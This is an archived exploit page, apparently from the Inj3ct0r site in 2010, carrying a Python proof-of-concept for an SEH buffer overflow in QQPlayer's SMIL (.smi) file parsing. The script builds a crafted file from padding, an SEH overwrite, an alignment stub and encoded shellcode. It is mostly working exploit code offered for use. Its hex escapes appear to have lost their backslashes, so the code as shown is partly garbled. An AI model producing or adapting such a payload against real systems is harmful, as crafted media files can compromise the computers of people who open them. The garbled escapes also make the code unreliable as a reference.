Home / os / win7

QQPlayer smi File Buffer Overflow Exploit

Posted on 27 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>QQPlayer smi File Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
QQPlayer smi File Buffer Overflow Exploit
=========================================


#!/usr/bin/env python
 
#################################################################
#
# Title: QQPlayer smi File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400p1
# Vulnerable: QQPlayer&lt;=2.3.696.400p1
#
#################################################################
# Code :
 
head ='''&lt;smil&gt;
 &lt;head&gt;
  &lt;meta name=&quot;title&quot; content=&quot;_&quot;/&gt;
  &lt;meta name=&quot;author&quot; content=&quot;Warner Music Group'''
 
junk = &quot;A&quot; * 2001
nseh =&quot;x42x61x21x61&quot;
seh  =&quot;x39x0cx41x00&quot;
adjust=&quot;x30x83xc0x0b&quot;
shellcode=(&quot;PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV&quot;
           &quot;QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL&quot;
           &quot;KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9&quot;
           &quot;QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW&quot;
           &quot;TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R&quot;
           &quot;HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA&quot;)
junk_=&quot;R&quot;*8000
foot ='''&quot;/&gt;
 &lt;/head&gt;
 &lt;body&gt;
   &lt;seq&gt;
    &lt;video src=&quot;rtsp://sos08-1-rm.eams.net/lis/424444/.uid.M0001&quot; title=&quot;_&quot;fill=&quot;freeze&quot;/&gt;
  &lt;/seq&gt;
 &lt;/body&gt;
&lt;/smil&gt;
&lt;!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c --&gt;'''
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
 
fobj = open(&quot;poc.smi&quot;,&quot;w&quot;)
fobj.write(payload)
fobj.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :